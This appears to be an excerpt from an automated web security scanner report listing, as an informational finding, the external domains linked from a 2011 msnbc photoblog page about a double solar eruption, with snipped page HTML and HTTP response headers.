<li class="email_subscribe_option"><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png" width="19" height="18" alt="Icons Email"> Receive e-mail updates</a>
...[SNIP]...
</div><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted">change this</a>
...[SNIP]...
<div class="spinner hide"><img src="http://www.polls.newsvine.com/_vine/images/__/spinner.gif" width="16" height="16" alt="Loading" /> Saving...</div>
...[SNIP]...
<a href="http://photoblog.msnbc.redacted/_feeds/rss2/author"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png" width="18" height="18" alt="Icons Feed"> Subscribe to RSS</a>
...[SNIP]...

<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</span>A spectacular double eruption on the sun was captured today by NASA's <a target="_blank" href="http://sdo.gsfc.nasa.gov/">Solar Dynamics Observatory</a>. The eruptions happened nearly simultaneously on opposite sides of the solar disk, <a target="_blank" href="http://spaceweather.com/">SpaceWeather.com reported</a>
...[SNIP]...
<p><a target="_blank" href="http://www.byjohnroach.com/"><i>
...[SNIP]...
</i><a target="_blank" href="http://www.facebook.com/cosmiclog"><i>
...[SNIP]...
</i><a href="http://twitter.com/b0yle"><i>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_pictures" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://photoblog.msnbc.redacted/_news/2011/01/28/5942494-double-whammy-on-the-sun" data-Text="Double whammy on the sun">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://photoblog.msnbc.redacted/_news/2011/01/28/5942494-double-whammy-on-the-sun" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<a href="#star2" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://MikeyMike.newsvine.com/">MikeyMike</a>
...[SNIP]...
<a href="#star3" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://DS-Houston.newsvine.com/">DS in Houston</a>
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<a href="#star4" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Ghost2516914.newsvine.com/">Ghost-2516914</a>
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<a href="#star5" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://revlucifer.newsvine.com/">RevLucifer</a>
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<a href="#star6" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Eric2189088.newsvine.com/">Eric-2189088</a>
...[SNIP]...
<div class="normal"><a href="http://revlucifer.newsvine.com/">RevLucifer</a>
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<div class="normal"><a href="http://OscarPWalnuts.newsvine.com/">Oscar P Walnuts</a>
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<div class="normal"><a href="http://whyajones.newsvine.com/">Cappy-1911</a>
...[SNIP]...
<div class="normal"><a href="http://jayphly1300264.newsvine.com/">jayphly-1300264</a>
...[SNIP]...
<div class="normal"><a href="http://patrick111.newsvine.com/">Patrick-1112710</a>
...[SNIP]...
<div class="normal"><a href="http://aanhonestsortnhonestsort-1436725.newsvine.com/">anhonestsort-1436725</a>
...[SNIP]...
<div class="normal"><a href="http://PhantomBeast.newsvine.com/">PhantomBeast</a>
...[SNIP]...
<div class="normal"><a href="http://mklavano.newsvine.com/">mklavano</a>
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<div class="normal"><a href="http://Roy-1813861.newsvine.com/">Roy-1813861</a>
...[SNIP]...
<div class="normal"><a href="http://martyofredbay.newsvine.com/">martyofredbay</a>
...[SNIP]...
<a href="#star7" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Nerakluvs.newsvine.com/">Nerakluvs</a>
...[SNIP]...
<div class="normal"><a href="http://phloeman.newsvine.com/">phloeman</a>
...[SNIP]...
<div class="normal"><a href="http://Cabernet2go.newsvine.com/">Ken Johnson-306874</a>
...[SNIP]...
<div class="normal"><a href="http://Sonflower.newsvine.com/">Sonflower</a>
...[SNIP]...
<div class="normal"><a href="http://wvbuild.newsvine.com/">wvbuild</a>
...[SNIP]...
<div class="normal"><a href="http://mdb123.newsvine.com/">MDB123</a>
...[SNIP]...
<div class="normal"><a href="http://Pandori.newsvine.com/">Pandori</a>
...[SNIP]...
<div class="normal"><a href="http://Attameus.newsvine.com/">Attameus</a>
...[SNIP]...
<div class="normal"><a href="http://IWonder2997692.newsvine.com/">I Wonder-2997692</a>
...[SNIP]...
<div class="normal"><a href="http://takestwo.newsvine.com/">takes two</a>
...[SNIP]...
<div class="normal"><a href="http://spiddas.newsvine.com/">Spiddas</a>
...[SNIP]...
<div class="normal"><a href="http://TheKhanKubla.newsvine.com/">TheKhanKubla</a>
...[SNIP]...
<div class="normal"><a href="http://countrygirl78.newsvine.com/">countrygirl78</a>
...[SNIP]...
<div class="normal"><a href="http://TheKhanKubla.newsvine.com/">TheKhanKubla</a>
...[SNIP]...
<div class="normal"><a href="http://tracer58.newsvine.com/">tracer58</a>
...[SNIP]...
<div class="normal"><a href="http://Tony2997870.newsvine.com/">Tony-2997870</a>
...[SNIP]...
<div class="normal"><a href="http://Tony2997870.newsvine.com/">Tony-2997870</a>
...[SNIP]...
<div class="normal"><a href="http://DumbJock.newsvine.com/">Dumb Jock</a>
...[SNIP]...
<div class="normal"><a href="http://hal90004.newsvine.com/">~HAL9000~</a>
...[SNIP]...
<div class="normal"><a href="http://TAMUK.newsvine.com/">TAMUK</a>
...[SNIP]...
<div class="normal"><a href="http://larbell.newsvine.com/">larbell</a>
...[SNIP]...
<div class="normal"><a href="http://paulhardy.newsvine.com/">orbust</a>
...[SNIP]...
<div class="normal"><a href="http://2srvHM.newsvine.com/">2srvHM</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="normal"><a href="http://twyla-moon.newsvine.com/">Twyla Moon</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://UnregisteredUser.newsvine.com/">Unregistered User</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://polanofp.newsvine.com/">An American!</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://phillyc1.newsvine.com/">PhillyC</a>
...[SNIP]...
<div class="normal"><a href="http://elven-bookworm.newsvine.com/">Elven Bookworm</a>
...[SNIP]...
<div class="normal"><a href="http://a--smith-1451820.newsvine.com/">A. Smith-1451820</a>
...[SNIP]...
<a href="#star8" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://MC2075922.newsvine.com/">MC-2075922</a>
...[SNIP]...
<a href="#star9" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<div class="normal"><a href="http://Phoehammer.newsvine.com/">Phoehammer</a>
...[SNIP]...
<div class="normal"><a href="http://BillyBill.newsvine.com/">BillyBill</a>
...[SNIP]...
<div class="normal"><a href="http://scott-mckinsey.newsvine.com/">Mbones</a>
...[SNIP]...
<div class="normal"><a href="http://edwardduffy.newsvine.com/">Edward Duffy</a>
...[SNIP]...
<div class="normal"><a href="http://DaveO2998087.newsvine.com/">Dave-O-2998087</a>
...[SNIP]...
<div class="normal"><a href="http://danwill2.newsvine.com/">danwill</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="normal"><a href="http://robw1001.newsvine.com/">Robert Fleming</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://jpfs52.newsvine.com/">jpfs52</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://twyla-moon.newsvine.com/">Twyla Moon</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://senigallia.newsvine.com/">senigallia</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://uradouch.newsvine.com/">uradouch</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://jwp6868.newsvine.com/">Joe in NC</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://a--smith-1451820.newsvine.com/">A. Smith-1451820</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://halowain.newsvine.com/">Hal Sherman</a>
...[SNIP]...
<div class="normal"><a href="http://countrygirl78.newsvine.com/">countrygirl78</a>
...[SNIP]...
<div class="normal"><a href="http://mar2892158.newsvine.com/">mar-2892158</a>
...[SNIP]...
<div class="normal"><a href="http://uradouch.newsvine.com/">uradouch</a>
...[SNIP]...
<div class="normal"><a href="http://uradouch.newsvine.com/">uradouch</a>
...[SNIP]...
<div class="normal"><a href="http://davidf3.newsvine.com/">DavidF</a>
...[SNIP]...
<div class="normal"><a href="http://takestwo.newsvine.com/">takes two</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://mnstrm2.newsvine.com/">Art-981203</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://ffeineandsugar.newsvine.com/">ffeineandsugar</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://sbphrog.newsvine.com/">SBPhrog</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://chibnikh.newsvine.com/">Herman C</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://steveorevo.newsvine.com/">S-480203</a>
...[SNIP]...
<div class="normal"><a href="http://Isthishumanity.newsvine.com/">Is this humanity</a>
...[SNIP]...
<div class="normal"><a href="http://snrekkcaj.newsvine.com/">Dissociate</a>
...[SNIP]...
<div class="normal"><a href="http://countrygirl78.newsvine.com/">countrygirl78</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="normal"><a href="http://rwh0829.newsvine.com/">riscifiguy</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://MikeObama2313287.newsvine.com/">Mike Obama-2313287</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://votelover.newsvine.com/">votelover</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://raysmith.newsvine.com/">ray smith</a>
...[SNIP]...
<div class="normal"><a href="http://Fritz2712801.newsvine.com/">Fritz-2712801</a>
...[SNIP]...
<div class="normal"><a href="http://countrygirl78.newsvine.com/">countrygirl78</a>
...[SNIP]...
<div class="normal"><a href="http://mar2892158.newsvine.com/">mar-2892158</a>
...[SNIP]...
<div class="normal"><a href="http://uradouch.newsvine.com/">uradouch</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://raysmith.newsvine.com/">ray smith</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://raysmith.newsvine.com/">ray smith</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Brilli99.newsvine.com/">Brilli-99</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://mklavano.newsvine.com/">mklavano</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://glenbo02.newsvine.com/">glenbo</a>
...[SNIP]...
<div class="normal"><a href="http://josh1791701.newsvine.com/">Josh-1791701</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://RevitRay.newsvine.com/">Revit Ray</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://martyofredbay.newsvine.com/">martyofredbay</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://mpp2029706.newsvine.com/">mpp-2029706</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Fritz2712801.newsvine.com/">Fritz-2712801</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://catastrophe3.newsvine.com/">cat(astrophe)</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="normal"><a href="http://markscastle.newsvine.com/">MC-784701</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://DaughterofDaedalus.newsvine.com/">Daughter of Daedalus</a>
...[SNIP]...
<div class="normal"><a href="http://davidf3.newsvine.com/">DavidF</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="privacytext"><a href="http://www.newsvine.com/_nv/cms/info/privacyPolicy" target="_blank">Newsvine Privacy Statement</a></div><img class="postCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif" /><img class="postingCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_posting.gif" /></div>
...[SNIP]...
<div class="newuser">As a new user, you may notice a few temporary content restrictions. <a href="http://www.newsvine.com/_nv/cms/help/newUsers" target="_blank">Click here for more info</a>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif" width="12" height="12" alt="Start Tracking" title="Add this article to your conversation tracker without commenting on it" />Start Tracking</span>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif" width="10" height="10" alt="Stop Tracking" />Stop Tracking</span>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="avatar"><a href="http://john-roach.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/jtroach-2120073942.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://redtape.msnbc.com/">Red Tape Chronicles</a>
...[SNIP]...
<a href="http://www.msnbc.redacted/"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png" alt="msnbc.com" width="166" height="20"></a>
...[SNIP]...
<li>
                   <a href="http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/">MSN Privacy</a>
...[SNIP]...
<li>
                   <a href="http://help.live.com/help.aspx?project=tou&mkt=en-us">Legal</a>
...[SNIP]...
</div><link rel="stylesheet" type="text/css" href="http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css">
<script type="text/javascript" language="JavaScript">
...[SNIP]...

22.248. http://photoblog.msnbc.redacted/_news/2011/01/28/5942494-double-whammy-on-the-sun previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://photoblog.msnbc.redacted
Path:	/_news/2011/01/28/5942494-double-whammy-on-the-sun

Issue detail

The page was loaded from a URL containing a query string:

http://photoblog.msnbc.redacted/_news/2011/01/28/5942494-double-whammy-on-the-sun?gt1=43001

The response contains the following links to other domains:

http://2srvhm.newsvine.com/
http://a--smith-1451820.newsvine.com/
http://aanhonestsortnhonestsort-1436725.newsvine.com/
http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://attameus.newsvine.com/
http://billybill.newsvine.com/
http://brilli99.newsvine.com/
http://cabernet2go.newsvine.com/
http://catastrophe3.newsvine.com/
http://chibnikh.newsvine.com/
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://countrygirl78.newsvine.com/
http://danwill2.newsvine.com/
http://dateline.msnbc.com/
http://daughterofdaedalus.newsvine.com/
http://daveo2998087.newsvine.com/
http://davidf3.newsvine.com/
http://ds-houston.newsvine.com/
http://dumbjock.newsvine.com/
http://edwardduffy.newsvine.com/
http://elven-bookworm.newsvine.com/
http://eric2189088.newsvine.com/
http://fdpfg.newsvine.com/
http://ffeineandsugar.newsvine.com/
http://fritz2712801.newsvine.com/
http://garrettb1.newsvine.com/
http://ghost2516914.newsvine.com/
http://glenbo02.newsvine.com/
http://hal90004.newsvine.com/
http://halowain.newsvine.com/
http://hardball.msnbc.com/
http://help.live.com/help.aspx?project=tou&mkt=en-us
http://ilovecanoes.newsvine.com/
http://isthishumanity.newsvine.com/
http://iwonder2997692.newsvine.com/
http://jayphly1300264.newsvine.com/
http://jbunn.newsvine.com/
http://john-roach.newsvine.com/
http://josh1791701.newsvine.com/
http://jpfs52.newsvine.com/
http://jwp6868.newsvine.com/
http://larbell.newsvine.com/
http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css
http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png
http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png
http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png
http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247
http://lib.newsvine.com/chrome/photoblog/style.css?v=23247
http://log.newsvine.com/poke.gif?x=0|26&get=c5942494&rand=930869644&do=msnbc.redacted&rf=http%3A%2F%2Fphotoblog.msnbc.redacted%2F_news%2F2011%2F01%2F28%2F5941280-mohamed-bouazizi-the-fruit-vendor-whose-death-may-have-changed-the-arab-world&ad=9:9:80;44::;27:27:108;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;50::
http://mar2892158.newsvine.com/
http://markscastle.newsvine.com/
http://martyofredbay.newsvine.com/
http://mc2075922.newsvine.com/
http://mdb123.newsvine.com/
http://mikeobama2313287.newsvine.com/
http://mikeymike.newsvine.com/
http://mklavano.newsvine.com/
http://mnstrm2.newsvine.com/
http://mossdog420m.newsvine.com/
http://mpp2029706.newsvine.com/
http://msn.whitepages.com/
http://mtp.msnbc.com/
http://nerakluvs.newsvine.com/
http://nightly.msnbc.com/
http://oscarpwalnuts.newsvine.com/
http://pandori.newsvine.com/
http://patrick111.newsvine.com/
http://paulhardy.newsvine.com/
http://phantombeast.newsvine.com/
http://phillyc1.newsvine.com/
http://phloeman.newsvine.com/
http://phoehammer.newsvine.com/
http://platform.twitter.com/widgets.js
http://polanofp.newsvine.com/
http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/
http://rachel.msnbc.com/
http://raysmith.newsvine.com/
http://redtape.msnbc.com/
http://revitray.newsvine.com/
http://revlucifer.newsvine.com/
http://robw1001.newsvine.com/
http://roy-1813861.newsvine.com/
http://rwh0829.newsvine.com/
http://sbphrog.newsvine.com/
http://scott-mckinsey.newsvine.com/
http://sdo.gsfc.nasa.gov/
http://senigallia.newsvine.com/
http://snrekkcaj.newsvine.com/
http://sonflower.newsvine.com/
http://spaceweather.com/
http://spiddas.newsvine.com/
http://steveorevo.newsvine.com/
http://takestwo.newsvine.com/
http://tamuk.newsvine.com/
http://thekhankubla.newsvine.com/
http://today.msnbc.com/
http://tony2997870.newsvine.com/
http://tracer58.newsvine.com/
http://tv.msnbc.com/
http://twitter.com/b0yle
http://twitter.com/share
http://twyla-moon.newsvine.com/
http://unregistereduser.newsvine.com/
http://uradouch.newsvine.com/
http://votelover.newsvine.com/
http://weralldoomed.newsvine.com/
http://whyajones.newsvine.com/
http://wire-bender.newsvine.com/
http://wvbuild.newsvine.com/
http://www.bing.com/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.byjohnroach.com/
http://www.delish.com/
http://www.everyblock.com/
http://www.facebook.com/cosmiclog
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://photoblog.msnbc.redacted/_news/2011/01/28/5942494-double-whammy-on-the-sun
http://www.hotmail.com/
http://www.newsvine.com/
http://www.newsvine.com/_nv/cms/help/newUsers
http://www.newsvine.com/_nv/cms/info/privacyPolicy
http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247
http://www.polls.newsvine.com/_static/css/8b751245ebdf90a2a023d6408b7a7907682211f2.css?v=23247
http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247
http://www.polls.newsvine.com/_static/js/da88e70e83817a8b3e0c3b7723071d44c87b04c0.js?v=23247
http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2
http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js
http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif
http://www.polls.newsvine.com/_vine/images/_/b_posting.gif
http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif
http://www.polls.newsvine.com/_vine/images/_/b_star.gif
http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif
http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif
http://www.polls.newsvine.com/_vine/images/__/spinner.gif
http://www.polls.newsvine.com/_vine/images/av/60x60/jtroach-2120073942.jpg
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=12
Date: Sun, 30 Jan 2011 16:57:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 191855

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
